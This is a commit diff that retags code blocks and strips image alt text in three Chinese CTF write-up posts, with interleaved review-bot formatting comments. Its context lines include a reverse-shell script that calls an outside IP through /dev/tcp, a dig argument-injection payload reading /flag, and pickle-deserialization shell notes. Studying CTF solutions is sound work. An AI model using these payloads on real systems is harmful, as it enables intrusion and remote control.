wip: update language tag of code block, remove alt text of image
Lil-Ran committed May 28, 2024
1 parent f012ecf commit 83f831c
Showing 5 changed files with 55 additions and 67 deletions.
14 changes: 7 additions & 7 deletions source/_posts/2024-AliyunCTF.md
@@ -294,7 +294,7 @@ string s1, string s2, string s3, string s4, string s5, string s6 -> int {

## BadApple

```Python
```javascript
let abuf = new ArrayBuffer(0x10);
let bbuf = new BigUint64Array(abuf);
let fbuf = new Float64Array(abuf);
@@ -735,7 +735,7 @@ if __name__ == '__main__':
main()
```

![img](../images/2024-AliyunCTF/20240325204801605.webp)
![](../images/2024-AliyunCTF/20240325204801605.webp)

## BabyDH2

@@ -1204,7 +1204,7 @@ if __name__ == '__main__':
g.gao()
```

![img](../images/2024-AliyunCTF/20240325204801682.webp)
![](../images/2024-AliyunCTF/20240325204801682.webp)

# Web

@@ -1218,7 +1218,7 @@ https://gtfobins.github.io/gtfobins/dig/
{"domain":"l1nyz-tel.cc","type":"-f/flag"}
```

![img](../images/2024-AliyunCTF/20240325204801511.webp)
![](../images/2024-AliyunCTF/20240325204801511.webp)

## chain17

@@ -1401,11 +1401,11 @@ dfs(start)

010打开发现文件中只有UTF-8字符,没有其他数据;一眼盯出,同时存在长得很像的“文”字和类似字

![img](../images/2024-AliyunCTF/20240325204801578.webp)
![](../images/2024-AliyunCTF/20240325204801578.webp)

换用兼容性不强的艺术字体(图中是字体圈欣意冠黑体)把这些字凸显出来,在Unicode表中检索,可以知道它们都是[康熙部首](https://zhuanlan.zhihu.com/p/352872903)`assert all([0x2f00 <= ord(c) <= 0x2fdf for c in '⽂⾼⾦⾄⽣⽇⽌⽤⾔⽅⾧⾯⾹⾮⾃⼈⼯⼀⼗⼥⾳⽽⽬⼤⼆⼲⼿⽃⾖⼜⾻⼐⼩⾊⽰⽕⾍⽅⿎⽴⼊⾏⽉⽇'])`

![img](../images/2024-AliyunCTF/20240325204801469.webp)
![](../images/2024-AliyunCTF/20240325204801469.webp)

原文有意义,不太可能是取这种字的字码,也不太可能是两个这种字之间的距离,因为有意义的原文不是这么好构造的。可以尝试把康熙部首和对应的正常字分别变成1和0

@@ -1655,7 +1655,7 @@ print(char)

得到332bits,给0和1分别上色,发现如果每14位分为一组,刚好最高位都是0,且存在相同的几行

![img](../images/2024-AliyunCTF/20240325204801445.webp)
![](../images/2024-AliyunCTF/20240325204801445.webp)

猜测14位编码一个汉字,尝试按区位码处理

58 changes: 23 additions & 35 deletions source/_posts/2024-D3CTF.md
@@ -15,7 +15,7 @@ mathjax: true

## 1.1 PwnShell

```C
```php
<?php
$libc = "";
$stack = "";
@@ -144,7 +144,7 @@ s

## 1.2 write_flag_where

```C
```python
import sys
from pwn import *

@@ -516,13 +516,13 @@ requests.post(url, json={ 'stdin': STDIN, 'monad': PAYLOAD1, 'elaina': PAYLOAD2

下载到别人上传的 tar 包之后发现逻辑,然后上车

![img](../images/2024-D3CTF/image1.webp)
![](../images/2024-D3CTF/image1.webp)

Exp

/.sandbox-module/bin/install-local-agent.sh 还有start-remote-agent.sh

```C++
```bash
#!/usr/bin/env bash

curl test.7b0db8c5.dnslog.store
@@ -533,7 +533,7 @@ bash -c "/bin/bash -i >& /dev/tcp/8.129.42.140/3307 0>&1"

打包,注意z参数

```C++
```bash
tar czf 1.tar sandbox .sandbox-module
```

@@ -791,7 +791,7 @@ Github 上给的 example 中分母就是一个 solve,猜测这里的分母和

代入两个式子后 Coppersmith 或者 gcd 两种方法都能求出 x, y

```Plain
```python
x,y=(2150041731351815713171104523921920493220624053206985451744233895108303740469684723305396314365408654901185731316940674743393624005747389336974965252847296612520628261079495101318288878763133399451251, 226424529213344999668721893182041940135510332166374912207004824461410074124256560817809951006519763202279310112144759780123971358841835703176196881303793274922977845173880043211792854018584878197697797884263497201497403074557926911586759787949296373546575946325913789515250)
from Crypto.Util.number import *

@@ -903,7 +903,7 @@ print(L)


```Python
```c++
#include <bits/stdc++.h>
using namespace std;

@@ -1026,6 +1026,9 @@ int main(int argc, char const *argv[])
}

// g++ multi.cpp -O3 -lpthread -o multi
```
```python
import random
secret_KEY = 886
from task_utils import *
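Review bot: the added closing fence before the new `python` fence is the substantive fix in this hunk: without it, everything from `import random` onward was rendered inside the C++ block, and the `// g++ multi.cpp -O3 -lpthread -o multi` build comment now correctly ends the C++ listing. One nit: the C++ block is opened with `c++` while the other tags in this commit use full lowercase names (`python`, `bash`, `php`); `cpp` is the more widely used identifier, though highlight.js accepts `c++` as an alias.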
@@ -1091,24 +1094,9 @@ class Gao:
if __name__ == '__main__':
g = Gao()
g.test_get_flag()
from PIL import Image
from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes

width, height = 72, 60
```

tap_list = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
chunk_size = 16
iv = '00000000000000000000000000000000'
iv = bytes.fromhex(iv)
enc = ImageEncryption(tap_list=tap_list, iv=iv)
img_c = Image.open('enc_from_server.png')
img_cb = image_to_bytes(img_c)
img_mb = enc.decryption(img_cb)
img_m = bytes_to_image(img_mb, width, height)
img_m.save('dec.png')
```python
from PIL import Image
from image_crypto import ImageEncryption, bytes_to_image, image_to_bytes

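Review bot: the deleted lines (from `from PIL import Image` through `img_m.save('dec.png')`) were a verbatim copy of the decryption snippet that survives below the new `python` fence, so dropping one copy and fencing the remaining one is correct; the following hunk's context (`img_m = bytes_to_image(img_mb, width, height)` / `img_m.save('dec.png')` / closing fence) shows the surviving copy still ends as a complete block.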
@@ -1129,7 +1117,7 @@ img_m = bytes_to_image(img_mb, width, height)
img_m.save('dec.png')
```

![img](../images/2024-D3CTF/image2.webp)
![](../images/2024-D3CTF/image2.webp)

## 3.5 enctwice

@@ -1296,7 +1284,7 @@ if __name__ == '__main__':

用伪随机数来决定虚拟机流程的虚拟机。首先打开ida的trace function可以dump出整个大概的执行流程,提取出函数的偏移,然后用idapython脚本可以提取大概的真正有用的汇编指令

```C++
```python
from idaapi import *
from idc import *
from ida_bytes import *
@@ -1332,7 +1320,7 @@ open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final)

随后就是在每个xor和shl下断点

```C++
```python
def rotate_left(num, shift):
if shift >= 8:
return 0
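Review bot: the tag change to `python` is right, but the context line shown in this hunk's header, `open(r"C:\Users\xman\Downloads\RandomVM\log.txt").write(final)`, opens the file in the default read-only mode, so `.write()` raises `io.UnsupportedOperation: not writable`; it needs `open(path, 'w')`, ideally inside a `with` block so the handle is closed and flushed. Outside the scope of a tag-only change, but worth fixing while this file is being touched.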
@@ -1472,7 +1460,7 @@ f.write(f"{num:#x} >> {al} = {(num>>al)&0xffffffffff:#x}\n")

输入0123456789ABCDEFGHIJKLMNOPQRSTUVWXY得到trace:

```Plain
```c
0x2324252627 << 4 = 0x3242526270
0x2324252627 >> 5 = 0x119212931
0x3242526270 ^ 0x119212931 = 0x335b734b41
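Review bot: the block retagged `c` here is the trace output of the shift/xor log (`0x2324252627 << 4 = 0x3242526270`, `0x2324252627 >> 5 = 0x119212931`, ...), not C source, so the highlighter will colour it as code and the `^`, `<<` and `=` lines will be tokenised as expressions; a lowercase `text` or `plaintext` tag keeps the intent of the original `Plain` while matching the lowercase convention this commit introduces.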
@@ -1540,15 +1528,15 @@ D3CTF(TECH-EV0LVE,EMBR@C3-PR0GR3SS)
爆破到 d3ctf{0ut??????????????} 不给爆了 乐
![img](../images/2024-D3CTF/image3.webp)
![](../images/2024-D3CTF/image3.webp)
18496 = 64 * 17 * 17, 每64byte一组,迷宫一共17*17大,win的条件是触发c000005,需要跑出去迷宫
![img](../images/2024-D3CTF/image4.webp)
![](../images/2024-D3CTF/image4.webp)
SEH里边根据当前位置的两个常量计算返回地址,num 1,2就是下图data里的两个常量,所以走迷宫,从MSB开始根据每一位是0还是1决定用上边两个还是下边两个计算下一次跳转的位置
![img](../images/2024-D3CTF/image5.webp)
![](../images/2024-D3CTF/image5.webp)
想走出去最后一次应该计算出一个比较大的值,那从0x406030+18496每64byte切片,然后从FF开始反向搜索,上图每两个cli对应一个flag bit上边是0下边是1,每两个cli里常量上边是*1的下边是*17的
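Review bot: in the three image lines of this hunk (`image3`, `image4`, `image5`) the `![](...)` sits directly between text lines with no blank line before or after, so in CommonMark-style renderers each image is parsed as a continuation line of the surrounding paragraph and rendered inline rather than as its own block; add a blank line on each side, as the other image lines in this file already have (for example around `image2` and `image6`). The alt-text change itself does not affect this.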
@@ -1605,7 +1593,7 @@ for a in range(33, 127):
f.close()
```

![img](../images/2024-D3CTF/image6.webp)
![](../images/2024-D3CTF/image6.webp)

## 4.4 ezjunk

@@ -1621,7 +1609,7 @@ fakeflag和flag在tea上无区别

**crc校验:**

![img](../images/2024-D3CTF/image7.webp)
![](../images/2024-D3CTF/image7.webp)

exp:

@@ -1735,7 +1723,7 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=

附件里有一个 OpenVPN 配置,但是缺少了 TLS key 部份。然后题目说缺失的部份在前往 `2a13:b487:11aa::d3:c7f:2f` 的路径上。所以就 mtr 一下,得到:

![img](../images/2024-D3CTF/image8.webp)
![](../images/2024-D3CTF/image8.webp)

按顺序拼起来就是 TLS key,而且长度刚好是整数。有了完整配置之后,就能通过 OpenVPN 连上实例。

@@ -1751,4 +1739,4 @@ https://koalastothemax%com/?aHR0cMM6Ly9rLnBvc3RpbWcuY2MvOVh4MHhmc1svZmxh_y5ebmc=

在activity里有flag

![img](../images/2024-D3CTF/image9.webp)
![](../images/2024-D3CTF/image9.webp)
22 changes: 11 additions & 11 deletions source/_posts/2024-DubheCTF.md
@@ -18,9 +18,9 @@ toc: true
根据提示开始脑洞,githack dump 源码

![img](../images/2024-DubheCTF/20240319010444813.webp)
![](../images/2024-DubheCTF/20240319010444813.webp)

![img](../images/2024-DubheCTF/20240319010444894.webp)
![](../images/2024-DubheCTF/20240319010444894.webp)

通过 `range: bytes={start}-{end}` 来读取 mem 中的密钥,伪造成 admin 上传 pt 文件,之后 torch load 的时候触发 pickle 反序列化。

@@ -156,7 +156,7 @@ if __name__ == '__main__':

Pickle 反序列化的时候,exec 执行一段 python 代码,新建一个 `@app.post("/")` 路由(相当于内存马?

![img](../images/2024-DubheCTF/20240319010444749.webp)
![](../images/2024-DubheCTF/20240319010444749.webp)

将 bot 发送的东西都写到一个文件里,弹 shell 进去 cat 看看即可

@@ -297,7 +297,7 @@ http://1.95.13.243:49319/getlocal?path=/app/pref.yml

同时看到没有打开 cache 功能

![img](../images/2024-DubheCTF/20240319010444775.webp)
![](../images/2024-DubheCTF/20240319010444775.webp)

需要找另一个文件写入点

@@ -322,15 +322,15 @@ function parse(x) {

http://1.95.13.243:49319/sub?target=clash&url=script:pref.yml&token=189069462103782304169366230

![img](../images/2024-DubheCTF/20240319010444751.webp)
![](../images/2024-DubheCTF/20240319010444751.webp)

## Javolution

游戏逻辑有一个负数溢出?反正打败恶龙了.jpg

http://1.95.54.152:34473/pal/cheat?hp=-1000000000&attack=-1000000000&defense=-1000000000

![img](../images/2024-DubheCTF/20240319010444758.webp)
![](../images/2024-DubheCTF/20240319010444758.webp)

然后 level 变 50

@@ -350,7 +350,7 @@ Jdk 17 反序列化
--add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED
```

![img](../images/2024-DubheCTF/20240319010444936.webp)
![](../images/2024-DubheCTF/20240319010444936.webp)

```Java
import com.fasterxml.jackson.databind.node.POJONode;
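Review bot: the context line `` ```Java `` below the image keeps a capitalised tag while this commit lowercases the others (`javascript`, `php`, `python`, `bash`); change it to `` ```java `` for consistency. Separately, the `--add-opens java.xml/``com.sun.org``.apache.xpath.internal.objects=ALL-UNNAMED` line inside the preceding fenced block carries stray double backticks that look like inline-code markup pasted into a code fence; inside a fence they render literally and would break the JVM flag if copied, so they should be stripped to `java.xml/com.sun.org.apache.xpath.internal.objects=ALL-UNNAMED`.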
@@ -720,7 +720,7 @@ for t in range(0, 257):
pass
```

![img](../images/2024-DubheCTF/20240319010444891.webp)
![](../images/2024-DubheCTF/20240319010444891.webp)

你永远可以相信可靠的J神逆出来的代码不会有任何问题

@@ -921,7 +921,7 @@ sh.interactive()
print(open('/flag').read())
```

![img](../images/2024-DubheCTF/20240319010444993.webp)
![](../images/2024-DubheCTF/20240319010444993.webp)

```
DubheCTF{l3HC7F_h45_4_8e77ER_Ch4lLEngE!}
@@ -999,7 +999,7 @@ alt-svc: h3=":443"; ma=86400

搭好这个隧道之后,就可以用 https://devtools.devprod.cloudflare.dev 连接这个 inspect 端口对 wrangler 项目进行调试。不过断点貌似不是很好下,不过可以在 Memory 里直接把整个 heap snapshot 导出,导出之后搜索一下 flag 就可以了。

![img](../images/2024-DubheCTF/20240319010444931.webp)
![](../images/2024-DubheCTF/20240319010444931.webp)

## no more taowa

@@ -1504,7 +1504,7 @@ if __name__ == '__main__':
# print(png_judge_type('./lsb_msb_test/' + f))
```

![img](../images/2024-DubheCTF/20240319010445007.webp)
![](../images/2024-DubheCTF/20240319010445007.webp)

```
DubheCTF{j00_H4V3_m4573r3d_m47Ry05HK4_d0Ll2!}
0 comments on commit 83f831c
